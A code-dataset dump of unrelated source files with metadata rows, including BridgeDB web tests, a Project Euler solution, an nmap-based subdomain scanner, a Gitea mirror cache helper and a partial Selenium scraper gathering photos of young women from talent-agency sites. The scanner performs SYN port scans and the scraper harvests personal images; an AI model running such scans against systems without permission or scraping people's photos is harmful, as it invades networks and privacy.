"are only run on CI servers."))
if not PID or not processExists(PID):
raise FailTest("Could not start BridgeDB process on CI server!")
self.br = None
def tearDown(self):
self.br = None
def openBrowser(self):
# use mechanize to open the BridgeDB website in its browser
self.br = mechanize.Browser()
# prevents 'HTTP Error 403: request disallowed by robots.txt'
self.br.set_handle_robots(False)
self.br.open(HTTP_ROOT)
# -------------- Home/Root page
self.assertTrue(self.br.viewing_html())
self.assertEquals(self.br.response().geturl(), HTTP_ROOT)
self.assertEquals(self.br.title(), "BridgeDB")
return self.br
def goToOptionsPage(self):
# check that we are on the root page
self.assertTrue(self.br.viewing_html())
self.assertEquals(self.br.response().geturl(), HTTP_ROOT)
# follow the link with the word 'bridges' in it.
# Could also use: text='bridges'
# Could also use: url='/options'
self.br.follow_link(text_regex='bridges')
# ------------- Options
self.assertEquals(self.br.response().geturl(), HTTP_ROOT + "/options")
return self.br
def submitOptions(self, transport, ipv6, captchaResponse):
# check that we are on the options page
self.assertEquals(self.br.response().geturl(), HTTP_ROOT + "/options")
# At this point, we'd like to be able to set some values in
# the 'advancedOptions' form. Unfortunately the HTML form
# does not define a 'name' attribute, so the we have to rely on
# the fact that this is the only form on the page and will therefore
# always exist at index 0.
#br.select_form(name="advancedOptions")
self.br.select_form(nr=0)
# change the pluggable transport to something else
self.br.form['transport'] = [transport]
if ipv6:
self.br.form['ipv6'] = ['yes']
self.br.submit()
# ------------- Captcha
EXPECTED_URL = HTTP_ROOT + "/bridges?transport=%s" % transport
if ipv6:
EXPECTED_URL += "&ipv6=yes"
self.assertEquals(self.br.response().geturl(), EXPECTED_URL)
# As on the previous page, the form does not define a 'name'
# attribute, forcing us to use the index of the form, i.e. 0
#self.br.select_form(name="captchaSubmission")
self.br.select_form(nr=0)
# input the required captcha response. There is only one captcha
# defined by default, so this should always be accepted. Note this
# will not be possible to automate if used with a third-party CAPTCHA
# systems (e.g. reCAPTCHA)
self.br.form['captcha_response_field'] = captchaResponse
captcha_response = self.br.submit()
# ------------- Results
# URL should be the same as last time
self.assertEquals(self.br.response().geturl(), EXPECTED_URL)
soup = BeautifulSoup(captcha_response.read())
return soup
def getBridgeLinesFromSoup(self, soup, fieldsPerBridge):
"""We're looking for something like this in the response::
<div class="bridge-lines">
obfs2 175.213.252.207:11125 5c6da7d927460317c6ff5420b75c2d0f431f18dd
</div>
"""
bridges = []
soup = soup.findAll(attrs={'class' : 'bridge-lines'})
self.assertTrue(soup, "Could not find <div class='bridge-lines'>!")
for portion in soup:
br_tags = portion.findChildren('br')
bridge_lines = set(portion.contents).difference(set(br_tags))
for bridge_line in bridge_lines:
bridge_line = bridge_line.strip()
if bridge_line:
fields = bridge_line.split()
bridges.append(fields)
self.assertTrue(len(bridges) > 0, "Found no bridge lines in %s" % soup)
for bridge in bridges:
self.assertEquals(len(bridge), fieldsPerBridge,
"Expected %d fields in bridge line %s"
% (fieldsPerBridge, bridge))
return bridges
def test_content_security_policy(self):
"""Check that the HTTP Content-Security-Policy header is set."""
self.br = mechanize.Browser()
self.br.set_handle_robots(False)
self.br.set_debug_http(True)
self.br.open(HTTP_ROOT)
headers = ''.join(self.br.response().info().headers)
self.assertIn("Content-Security-Policy", headers)
self.assertIn("default-src 'none';", headers)
def test_404(self):
"""Asking for a non-existent resource should yield our custom 404 page,
but we can't actually check because Mechanize flips out if we get
anything response code other than 200. :/
"""
page = '/'.join([HTTP_ROOT, '404'])
self.openBrowser()
self.assertRaises(mechanize.HTTPError, self.br.open, page)
def test_get_obfs3_ipv4(self):
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs3'
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=3)
for bridge in bridges:
pt = bridge[0]
self.assertEquals(PT, pt)
def test_get_vanilla_ipv4(self):
self.openBrowser()
self.goToOptionsPage()
PT = '0'
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=2)
for bridge in bridges:
self.assertTrue(bridge != None)
addr = bridge[0].rsplit(':', 1)[0]
self.assertIsInstance(ipaddr.IPAddress(addr), ipaddr.IPv4Address)
def test_get_vanilla_ipv6(self):
self.openBrowser()
self.goToOptionsPage()
PT = '0'
soup = self.submitOptions(transport=PT, ipv6=True,
captchaResponse=CAPTCHA_RESPONSE)
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=2)
for bridge in bridges:
self.assertTrue(bridge != None)
addr = bridge[0].rsplit(':', 1)[0].strip('[]')
self.assertIsInstance(ipaddr.IPAddress(addr), ipaddr.IPv6Address)
def test_get_scramblesuit_ipv4(self):
self.openBrowser()
self.goToOptionsPage()
PT = 'scramblesuit'
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=4)
for bridge in bridges:
pt = bridge[0]
password = bridge[-1]
self.assertEquals(PT, pt)
self.assertTrue(password.find("password=") != -1,
"Password field missing expected text")
def test_get_obfs4_ipv4(self):
"""Try asking for obfs4 bridges, and check that the PT arguments in the
returned bridge lines were space-separated.
This is a regression test for #12932, see
https://bugs.torproject.org/12932.
"""
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs4'
try:
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
except ValueError as error:
if 'non-disabled' in str(error):
raise SkipTest("Pluggable Transport obfs4 is currently disabled.")
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=6)
for bridge in bridges:
pt = bridge[0]
ptArgs = bridge[-3:]
self.assertEquals(PT, pt)
self.assertTrue(len(ptArgs) == 3,
("Expected obfs4 bridge line to have 3 PT args, "
"found %d instead: %s") % (len(ptArgs), ptArgs))
def test_get_obfs4_ipv4_iatmode(self):
"""Ask for obfs4 bridges and check that there is an 'iat-mode' PT
argument in the bridge lines.
"""
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs4'
try:
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
except ValueError as error:
if 'non-disabled' in str(error):
raise SkipTest("Pluggable Transport obfs4 is currently disabled.")
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=6)
for bridge in bridges:
ptArgs = bridge[-3:]
hasIATMode = False
for arg in ptArgs:
if 'iat-mode' in arg:
hasIATMode = True
self.assertTrue(hasIATMode,
"obfs4 bridge line is missing 'iat-mode' PT arg.")
def test_get_obfs4_ipv4_publickey(self):
"""Ask for obfs4 bridges and check that there is an 'public-key' PT
argument in the bridge lines.
"""
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs4'
try:
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
except ValueError as error:
if 'non-disabled' in str(error):
raise SkipTest("Pluggable Transport obfs4 is currently disabled.")
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=6)
for bridge in bridges:
ptArgs = bridge[-3:]
hasPublicKey = False
for arg in ptArgs:
if 'public-key' in arg:
hasPublicKey = True
self.assertTrue(hasPublicKey,
"obfs4 bridge line is missing 'public-key' PT arg.")
def test_get_obfs4_ipv4_nodeid(self):
"""Ask for obfs4 bridges and check that there is an 'node-id' PT
argument in the bridge lines.
"""
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs4'
try:
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
except ValueError as error:
if 'non-disabled' in str(error):
raise SkipTest("Pluggable Transport obfs4 is currently disabled.")
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=6)
for bridge in bridges:
ptArgs = bridge[-3:]
hasNodeID = False
for arg in ptArgs:
if 'node-id' in arg:
hasNodeID = True
self.assertTrue(hasNodeID,
"obfs4 bridge line is missing 'node-id' PT arg.")
class _HTTPTranslationsTests(unittest.TestCase):
"""Build a TestCase with dynamic methods which tests all HTTP rendering of
all translations in the bridgedb/i18n/ directory.
"""
i18n = os.path.join(TOPDIR, 'bridgedb', 'i18n')
def setUp(self):
if not os.environ.get("CI"):
raise SkipTest(("The mechanize tests cannot handle self-signed "
"TLS certificates, and thus require opening "
"another port for running a plaintext HTTP-only "
"BridgeDB webserver. Because of this, these tests "
"are only run on CI servers."))
if not PID or not processExists(PID):
raise FailTest("Could not start BridgeDB process on CI server!")
self.br = None
@classmethod
def makeTestMethod(cls, locale):
"""Dynamically generate a test_ method for **locale**."""
def test(self):
pageArgs = '/?lang=%s' % locale
language = gettext.translation("bridgedb",
localedir=self.i18n,
languages=[locale,],
fallback=True)
expected = language.gettext("What are bridges?")
if not locale.startswith('en'):
self.assertNotEqual(expected, "What are bridges?")
self.openBrowser()
self.br.open(HTTP_ROOT + pageArgs)
self.assertSubstring(expected, self.br.response().read())
test.__name__ = 'test_%s' % locale
setattr(cls, test.__name__, test)
return test
def tearDown(self):
self.br = None
def openBrowser(self):
self.br = mechanize.Browser()
self.br.set_handle_robots(False)
def test_self(self):
self.assertTrue(self)
def createHTTPTranslationsTestSuite():
suite = unittest.TestSuite()
translations = os.listdir(_HTTPTranslationsTests.i18n)
translations.remove('templates')
for locale in translations:
klass = _HTTPTranslationsTests
method = klass.makeTestMethod(locale)
case = klass()
suite.addTest(case)
return [suite,]
class HTTPTranslationsTests(unittest.TestCase):
__metaclass__ = DynamicTestCaseMeta
testResult = TestResult()
testSuites = createHTTPTranslationsTestSuite()
| 36.767606 | 82 | 0.605057 |
14971e35d62b0d7138554c9af3d9672897a7b897 | 1,251 | py | Python | solutions/12-highly-divisible-triangle-number.py | whitegreyblack/euler | bd8e7ca444eeb51b3c923f1235906054c507ecc8 | [
"MIT"
] | null | null | null | solutions/12-highly-divisible-triangle-number.py | whitegreyblack/euler | bd8e7ca444eeb51b3c923f1235906054c507ecc8 | [
"MIT"
] | null | null | null | solutions/12-highly-divisible-triangle-number.py | whitegreyblack/euler | bd8e7ca444eeb51b3c923f1235906054c507ecc8 | [
"MIT"
] | null | null | null | # problem 12
# highly divisible triangle number
"""
The sequence of triangle numbers is generated by adding the natural numbers. So the 7th triangle number would be 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28. The first ten terms would be:
1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...
Let us list the factors of the first seven triangle numbers:
1: 1: 1
2: 3: 1,3
3: 6: 1,2,3,6
4: 10: 1,2,5,10
5: 15: 1,3,5,15
6: 21: 1,3,7,21
7: 28: 1,2,4,7,14,28
We can see that 28 is the first triangle number to have over five divisors.
What is the value of the first triangle number to have over five hundred divisors?
"""
import math
import functools as fn
fs_cache = {}
def factors(x):
divisors = []
for i in range(1, int(x**0.5) + 1):
if x % i == 0:
divisors.append([i, x // i])
return set(fn.reduce(list.__add__, divisors))
nn_cache = {}
def natural_numbers(x): # x is the index
if x not in nn_cache:
if x == 0:
nn_cache[x] = x
else:
nn_cache[x] = x + natural_numbers(x-1)
return nn_cache[x]
max_fs = 500
x = 1
nat = natural_numbers(x)
fs = list(factors(nat))
l = len(fs)
while l < max_fs:
x += 1
nat = natural_numbers(x)
fs = list(factors(nat))
l = len(fs)
print(nat)
| 25.02 | 174 | 0.61231 |
e13dcfb320f0c3fe2644c04cb861df86e94ccd07 | 964 | py | Python | subdomain-examiner/examiner.py | bitfede/subomain-examiner | f9faa4fa7bff6c136867c35045a9763da6f160e2 | [
"MIT"
] | null | null | null | subdomain-examiner/examiner.py | bitfede/subomain-examiner | f9faa4fa7bff6c136867c35045a9763da6f160e2 | [
"MIT"
] | null | null | null | subdomain-examiner/examiner.py | bitfede/subomain-examiner | f9faa4fa7bff6c136867c35045a9763da6f160e2 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import socket
import nmap
nm = nmap.PortScanner()
def examine(subdomain_data):
try:
ip_addr = socket.gethostbyname(subdomain_data)
except socket.error:
return {}
print(f"[*] Examining {subdomain_data} | IP: {ip_addr}")
nm.scan(subdomain_data, arguments='-sS -Pn')
results = {}
if ip_addr not in nm.all_hosts():
print("[!] No ip_addr key found in nm scan object")
return results
results["Hostname"] = nm[ip_addr].hostname()
results["State"] = nm[ip_addr].state()
results["Ports"] = []
if 'tcp' not in nm[ip_addr]:
print("[!] No TCP ports open")
return results
for key in nm[ip_addr]['tcp'].keys():
# print(nm[ip_addr]['tcp'][key])
port_data = {
"portNumber": key,
"portStatus": nm[ip_addr]['tcp'][key]
}
results["Ports"].append(port_data)
# print(results)
return results
| 21.422222 | 60 | 0.58195 |
0c15373296cca0577e7e08b108c3bc9523d69392 | 787 | py | Python | src/localCacheHelper.py | gopaljigaur/github-gitea-mirror | de3b97ef9fd36fd352f94ceee7e79de02cc6ebef | [
"MIT"
] | 79 | 2020-10-14T03:05:45.000Z | 2022-03-27T01:07:52.000Z | src/localCacheHelper.py | Ta180m/github-gitea-mirror | 0238264eda182f8ad946a28a95405297ef12e6e7 | [
"MIT"
] | 2 | 2021-02-20T01:26:07.000Z | 2021-03-16T00:52:06.000Z | src/localCacheHelper.py | Ta180m/github-gitea-mirror | 0238264eda182f8ad946a28a95405297ef12e6e7 | [
"MIT"
] | 12 | 2020-10-18T01:31:47.000Z | 2021-11-09T23:44:57.000Z | #!/usr/bin/env python
giteaExistsRepos = dict()
from helper import logError,log,getConfig
import json
config = getConfig()
def writeLocalCache(content):
try:
with open(config['local_cache']['file_path'], 'w') as file:
file.write(json.dumps(content, indent=4, sort_keys=True))
except:
logError('Unable To Save Local Cache !')
def readLocalCache():
try:
with open(config['local_cache']['file_path'],'r') as file:
filedata = file.read()
return json.loads(filedata)
except:
logError('Local Cache File Not Found ! / Unable To Ready It')
return dict()
giteaExistsRepos = readLocalCache()
useLocalCache = config['local_cache']['enabled']
def saveLocalCache():
writeLocalCache(giteaExistsRepos) | 25.387097 | 70 | 0.663278 |
16ac304ce55b96016d40f933b1cd1fa5c54010cf | 49 | py | Python | runAtrix.py | felipedeoliveirarios/Atrix | 403da137fb9c74136d192da656efa5eea19012aa | [
"MIT"
] | 1 | 2021-06-25T13:34:34.000Z | 2021-06-25T13:34:34.000Z | runAtrix.py | felipedeoliveirarios/Atrix | 403da137fb9c74136d192da656efa5eea19012aa | [
"MIT"
] | null | null | null | runAtrix.py | felipedeoliveirarios/Atrix | 403da137fb9c74136d192da656efa5eea19012aa | [
"MIT"
] | null | null | null | from main import updater
updater.start_polling()
| 16.333333 | 24 | 0.836735 |
1b6950adf8b6c7ced97378a31a9e12cfb8dd1e22 | 714 | py | Python | geoweb/skiresorts/migrations/0001_initial.py | RitzAnthony/Ski_GeoDjango | 7a06e9393abc328fe5008ba13c51e116d9b560cb | [
"MIT"
] | null | null | null | geoweb/skiresorts/migrations/0001_initial.py | RitzAnthony/Ski_GeoDjango | 7a06e9393abc328fe5008ba13c51e116d9b560cb | [
"MIT"
] | null | null | null | geoweb/skiresorts/migrations/0001_initial.py | RitzAnthony/Ski_GeoDjango | 7a06e9393abc328fe5008ba13c51e116d9b560cb | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2019-04-20 19:29
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Skiresort',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('geom', django.contrib.gis.db.models.fields.MultiPolygonField(null=True, srid=21781)),
],
options={
'db_table': 'ski resorts',
},
),
]
| 26.444444 | 114 | 0.57423 |
57eb8a85e570bac30dfcf3bcaaa4800c167fd1f1 | 2,023 | py | Python | patterns.py | adiah80/Game-Of-Life | c1922e9cff04b6d1cc567bbeccb6af8e562d3e41 | [
"MIT"
] | null | null | null | patterns.py | adiah80/Game-Of-Life | c1922e9cff04b6d1cc567bbeccb6af8e562d3e41 | [
"MIT"
] | null | null | null | patterns.py | adiah80/Game-Of-Life | c1922e9cff04b6d1cc567bbeccb6af8e562d3e41 | [
"MIT"
] | null | null | null |
patternsDict = {
########## STILL LIFES ##########
"Block" : [
[0,0],
[0,1],
[1,0],
[1,1],
],
"BeeHive" : [
[0,1],
[0,2],
[1,0],
[1,3],
[2,1],
[2,2]
],
"Loaf" : [
[0,1],
[0,2],
[1,0],
[1,3],
[2,1],
[2,3],
[3,2]
],
"Boat" : [
[0,0],
[0,1],
[1,0],
[1,2],
[2,1]
],
"Tub" : [
[0,1],
[1,0],
[1,2],
[2,1]
],
########## OSCILLATORS ##########
"Blinker" : [
[1,0],
[1,1],
[1,2],
],
"Toad" : [
[1,1],
[1,2],
[1,3],
[2,0],
[2,1],
[2,2],
],
"Beacon" : [
[0,0],
[0,1],
[1,0],
[2,3],
[3,2],
[3,3],
],
"Pulsar" : [
[2,0],
[3,0],
[4,0],
[8,0],
[9,0],
[10,0],
[2,5],
[3,5],
[4,5],
[8,5],
[9,5],
[10,5],
[2,7],
[3,7],
[4,7],
[8,7],
[9,7],
[10,7],
[2,12],
[3,12],
[4,12],
[8,12],
[9,12],
[10,12],
[0,2],
[0,3],
[0,4],
[0,8],
[0,9],
[0,10],
[5,2],
[5,3],
[5,4],
[5,8],
[5,9],
[5,10],
[7,2],
[7,3],
[7,4],
[7,8],
[7,9],
[7,10],
[12,2],
[12,3],
[12,4],
[12,8],
[12,9],
[12,10],
],
##### SPACESHIPS #####
"Glider" : [
[1,0],
[0,2],
[1,2],
[2,2],
[2,1],
],
"HeavySpaceship" : [
[1,0],
[3,0],
[0,1],
[0,2],
[4,2],
[0,3],
[4,3],
[0,4],
[0,5],
[3,5],
[0,6],
[1,6],
[2,6],
],
########## GUNS ##########
"GosperGun" : [
[4,0],
[5,0],
[4,1],
[5,1],
[4,10],
[5,10],
[6,10],
[3,11],
[7,11],
[2,12],
[8,12],
[2,13],
[8,13],
[5,14],
[3,15],
[7,15],
[4,16],
[5,16],
[6,16],
[7,17],
[2,20],
[3,20],
[4,20],
[2,21],
[3,21],
[4,21],
[1,22],
[5,22],
[0,24],
[1,24],
[5,24],
[6,24],
[2,34],
[3,34],
[2,35],
[3,35],
],
########## METHUSELAHS ##########
"Diehard" : [
[0,6],
[1,0],
[1,1],
[2,1],
[2,5],
[2,6],
[2,7],
],
"Acorn" : [
[0,1],
[1,3],
[2,0],
[2,1],
[2,4],
[2,5],
[2,6],
],
"Engine1" : [
[0,6],
[1,4],
[1,6],
[1,7],
[2,4],
[2,6],
[3,4],
[4,2],
[5,0],
[5,2],
],
} | 8.951327 | 34 | 0.265942 |
4138f48ac5f9a52e6af1b2580158f3b540e7fb8f | 236 | py | Python | util/print_included_projects.py | doitintl/iris3 | 3534bd590fa6dc1d28fc8434300a187831da1090 | [
"MIT"
] | 30 | 2021-02-02T20:17:44.000Z | 2022-03-27T09:17:32.000Z | util/print_included_projects.py | doitintl/iris3 | 3534bd590fa6dc1d28fc8434300a187831da1090 | [
"MIT"
] | 14 | 2021-03-08T19:54:31.000Z | 2022-03-12T20:32:30.000Z | util/print_included_projects.py | doitintl/iris3 | 3534bd590fa6dc1d28fc8434300a187831da1090 | [
"MIT"
] | 12 | 2021-07-08T18:50:27.000Z | 2022-03-11T17:10:35.000Z | from util.config_utils import configured_projects
"""Used from deploy.sh"""
def print_included_projects():
projects = configured_projects()
print(" ".join(projects))
if __name__ == "__main__":
print_included_projects()
| 18.153846 | 49 | 0.728814 |
92d69cb542072d873d7405a9dfcc32e2741e410a | 97 | py | Python | TideRec/core/Base.py | Zangshihui/TideRec | 4d1ffce1e08b0a15429b84b5058ddc37f3df6219 | [
"Apache-2.0"
] | null | null | null | TideRec/core/Base.py | Zangshihui/TideRec | 4d1ffce1e08b0a15429b84b5058ddc37f3df6219 | [
"Apache-2.0"
] | null | null | null | TideRec/core/Base.py | Zangshihui/TideRec | 4d1ffce1e08b0a15429b84b5058ddc37f3df6219 | [
"Apache-2.0"
] | null | null | null | class Base(object):
def __init__(self, *args, **kwargs):
super(Base, self).__init__() | 32.333333 | 40 | 0.628866 |
e05d0bbdf0b21919d0490cfbd0a72f9948288ccf | 271 | py | Python | app/common/helpers.py | samousli/ikiru | 4a4a002db398dd7ba1b112ea406c92b0a8cb6c37 | [
"MIT"
] | null | null | null | app/common/helpers.py | samousli/ikiru | 4a4a002db398dd7ba1b112ea406c92b0a8cb6c37 | [
"MIT"
] | null | null | null | app/common/helpers.py | samousli/ikiru | 4a4a002db398dd7ba1b112ea406c92b0a8cb6c37 | [
"MIT"
] | null | null | null | import re
EMAIL_RFC5322 = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)")
def is_valid_email(candidate):
"""
Validates an email address using RFC5322
Courtesy of: https://emailregex.com/
"""
return EMAIL_RFC5322.match(candidate)
| 20.846154 | 81 | 0.634686 |
dc55648719ae3e1f72b5fbb4668d5a1e9001f2ba | 229 | py | Python | picokitadv/demo_codes/Project_16_1_channel_relay_module.py | yoyojacky/my_pico | bb9fb61d92635ad8c294b008e12615857aca6219 | [
"MIT"
] | 3 | 2021-06-07T16:17:35.000Z | 2021-12-31T20:28:36.000Z | picokitadv/demo_codes/Project_16_1_channel_relay_module.py | yoyojacky/my_pico | bb9fb61d92635ad8c294b008e12615857aca6219 | [
"MIT"
] | null | null | null | picokitadv/demo_codes/Project_16_1_channel_relay_module.py | yoyojacky/my_pico | bb9fb61d92635ad8c294b008e12615857aca6219 | [
"MIT"
] | 2 | 2021-07-06T04:42:22.000Z | 2022-03-06T06:19:31.000Z | from machine import Pin
from time import sleep
# GP4 - IN
relay_pin = Pin(4, Pin.OUT)
while True:
print("turn on relay!")
relay_pin.value(1)
sleep(5)
print("turn off relay!")
relay_pin.value(0)
sleep(5) | 17.615385 | 28 | 0.641921 |
d2b717e2157ac020a91cee3be3b2188b74ec16cc | 3,560 | py | Python | create_function_pages.py | jaxbulsara/pqm-guide | 9708cf5d16c1bd1e04dce979eb4d2be67e487b90 | [
"MIT"
] | 1 | 2021-07-12T09:23:15.000Z | 2021-07-12T09:23:15.000Z | create_function_pages.py | jaxbulsara/pqm-guide | 9708cf5d16c1bd1e04dce979eb4d2be67e487b90 | [
"MIT"
] | null | null | null | create_function_pages.py | jaxbulsara/pqm-guide | 9708cf5d16c1bd1e04dce979eb4d2be67e487b90 | [
"MIT"
] | null | null | null | from pathlib import Path
class FunctionPageCreator:
def __init__(self):
self.function_list_filename = "power_m_functions.txt"
self.function_path = Path.cwd().joinpath("functions")
def run(self):
self._read_function_list()
self._create_function_pages()
def _read_function_list(self):
with open(self.function_list_filename, "r") as function_list_file:
self.function_list_raw = function_list_file.read()
# print(self.function_list_raw)
# TODO: Refactor this method by abstracting subroutines.
def _create_function_pages(self):
self.function_list = dict()
header_name = None
for line in self.function_list_raw.split("\n"):
if line.strip() == "":
continue
elif line.startswith(" "):
# print(f"\tFunction: {line.strip()}")
function_name = line.strip().replace(" ", "-").replace(".", "-").lower()
if "#" in function_name:
function_name = function_name.replace("#", "sharp")
line = line.replace("#", "\#")
if "overview" in function_name:
continue
function_page_path = header_path.joinpath(function_name + ".md")
print(f"Creating function page at: {function_page_path}")
if not function_page_path.exists():
function_page_path.touch()
with open(function_page_path, "w") as function_page_file:
function_page_file.write("---\n")
function_page_file.write("---\n\n")
function_page_file.write(f"# {line.strip()}\n\n")
function_page_file.write(
f"Microsoft Docs: [{line.strip()}](https://docs.microsoft.com/en-us/powerquery-m/{function_name})\n\n"
)
function_page_file.write("## Syntax\n\n")
function_page_file.write("```powerquery-m\n")
function_page_file.write("Syntax for this function.\n")
function_page_file.write("```\n\n")
function_page_file.write("## About\n\n")
function_page_file.write("About this function.\n\n")
else:
# print(f"Header: {line.strip()}")
header_name = line.strip().replace(" ", "-").lower()
# print(f"Creating header: {header_name}")
header_path = self.function_path.joinpath(header_name)
print(f"Creating header directory at: {header_path}")
header_path.mkdir(exist_ok=True)
readme_path = header_path.joinpath("README.md")
print(f"Creating README at: {readme_path}")
if not readme_path.exists():
readme_path.touch()
with open(readme_path, "w") as readme_file:
readme_file.write("---\n")
readme_file.write("---\n\n")
readme_file.write(f"# {line.strip()}\n\n")
readme_file.write(
f"Microsoft Docs: [{line.strip()}](https://docs.microsoft.com/en-us/powerquery-m/{header_name})\n\n"
)
readme_file.write("About this function group.\n\n")
readme_file.write("{% include list.liquid all=true %}")
if __name__ == "__main__":
process = FunctionPageCreator()
process.run()
| 38.27957 | 126 | 0.541011 |
e8339c2606980e8c155c85c496f4ce65737d5265 | 18,492 | py | Python | main.py | YA-androidapp/Selenium-Talent | 1a53eee165d22be930bc1acb5388cc541da3051d | [
"Apache-2.0"
] | null | null | null | main.py | YA-androidapp/Selenium-Talent | 1a53eee165d22be930bc1acb5388cc541da3051d | [
"Apache-2.0"
] | 6 | 2021-03-31T20:04:14.000Z | 2022-03-12T00:44:56.000Z | main.py | YA-androidapp/Selenium-Talent | 1a53eee165d22be930bc1acb5388cc541da3051d | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 YA-androidapp(https://github.com/YA-androidapp) All rights reserved.
# pip install icrawler
# pip install opencv-python opencv-contrib-python
# pip install selenium
from bs4 import BeautifulSoup
from icrawler.builtin import BingImageCrawler
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from seleniumrequests import Firefox
import codecs
import cv2
import datetime
import numpy as np
import os
import re
import requests
import tempfile
import time
import urllib.parse
import urllib.request
currentdirectory = os.path.dirname(os.path.abspath(__file__))
os.chdir(currentdirectory)
print(os.getcwd())
# 検索パラメータ
AGE_MIN = 18
AGE_MAX = 30
# 定数
DATA_FILEPATH = os.path.join(
currentdirectory, 'data', 'dat_'+datetime.datetime.now().strftime('%Y%m%d%H%M%S') + '.txt')
LOG_FILEPATH = os.path.join(
currentdirectory, 'data', 'log_'+datetime.datetime.now().strftime('%Y%m%d%H%M%S') + '.txt')
HAARCASCADE_PATH = 'sources/data/haarcascades/haarcascade_frontalface_default.xml'
faceCascadeClassifier = cv2.CascadeClassifier(HAARCASCADE_PATH)
PHOTO_DIRPATH = os.path.join(currentdirectory, 'data', 'img')
TEMP_DIRPATH = os.path.join(currentdirectory, 'data', 'temp')
PERSONS_PER_PAGE = 20
WAITING_TIME = 2000
WAITING_TIME_SEARCH = 10
# URI
baseUris = [
# https://www.talent-databank.co.jp/guideline/index.html
'https://www.talent-databank.co.jp',
'https://talemecasting-next.com' # https://talemecasting-next.com/agreement
]
targetUris = [
'https://www.talent-databank.co.jp/',
'https://talemecasting-next.com/talent?sex_flg%5B%5D=1&genre%5B%5D=11&genre%5B%5D=12&genre%5B%5D=13&genre%5B%5D=15&genre%5B%5D=16&genre%5B%5D=17&genre%5B%5D=19&genre%5B%5D=20&age_min=' +
str(AGE_MIN)+'&age_max='+str(AGE_MAX)
]
# # カテゴリ毎に、取得するページ数
# MAX_PAGE = [
# 20,
# 20
# ]
# スクショ保存時のファイル名を生成
def get_filepath():
now = datetime.datetime.now()
filename = 'screen_{0:%Y%m%d%H%M%S}.png'.format(now)
filepath = os.path.join(currentdirectory, filename)
return filepath
def imread2(filename, flags=cv2.IMREAD_COLOR, dtype=np.uint8):
try:
n = np.fromfile(filename, dtype)
img = cv2.imdecode(n, flags)
return img
except Exception as e:
print(e)
return None
def imwrite2(filename, img, params=None):
try:
ext = os.path.splitext(filename)[1]
result, n = cv2.imencode(ext, img, params)
if result:
with open(filename, mode='w+b') as f:
n.tofile(f)
return True
else:
return False
except Exception as e:
print(e)
return False
def collect():
result_names = []
os.makedirs(os.path.join(currentdirectory, 'data'), exist_ok=True)
if os.path.exists(PHOTO_DIRPATH):
nowstr = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
os.rename(PHOTO_DIRPATH, PHOTO_DIRPATH + '_' + nowstr + '.bak')
os.makedirs(PHOTO_DIRPATH, exist_ok=True)
with open(DATA_FILEPATH, 'a', encoding='utf-8') as datafile:
with open(LOG_FILEPATH, 'a', encoding='utf-8') as logfile:
print('\tcollect() Start: {}'.format(
datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
binary = FirefoxBinary(
'C:\\Program Files\\Mozilla Firefox\\firefox.exe')
profile = FirefoxProfile(
'C:\\Users\\y\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\mv060idd.default')
fox = webdriver.Firefox(
firefox_profile=profile,
firefox_binary=binary,
executable_path='C:\\geckodriver\\geckodriver.exe'
)
fox.set_page_load_timeout(6000)
try:
fox.set_window_size(1280, 720)
# talent-databank
baseUri = baseUris[0]
targetUri = targetUris[0]
print('\tcollect() baseUri: {} {}'.format(
baseUri, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
print('\tcollect() targetUri: {} {}'.format(
targetUri, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
# 検索条件
fox.get(targetUri)
time.sleep(1)
WebDriverWait(fox, WAITING_TIME).until(
EC.presence_of_element_located((By.XPATH, '//body')))
print('\tcollect() body', file=logfile, flush=True)
# 「女性」
clickSelector(fox, 'input[type="checkbox"][value="female"]')
# # 「タレント・俳優・女優」(最初の要素)の「もっと詳しく」
# clickLink(fox, 'もっと詳しく')
# # 「女優」
# clickSelector(fox, 'input[type="checkbox"][value=":女優"]')
# 「女優」
clickSelector(
fox, 'input[type="checkbox"][value="タレント,俳優,女優"]')
clickSelector(fox, 'input[type="checkbox"][value="音楽"]')
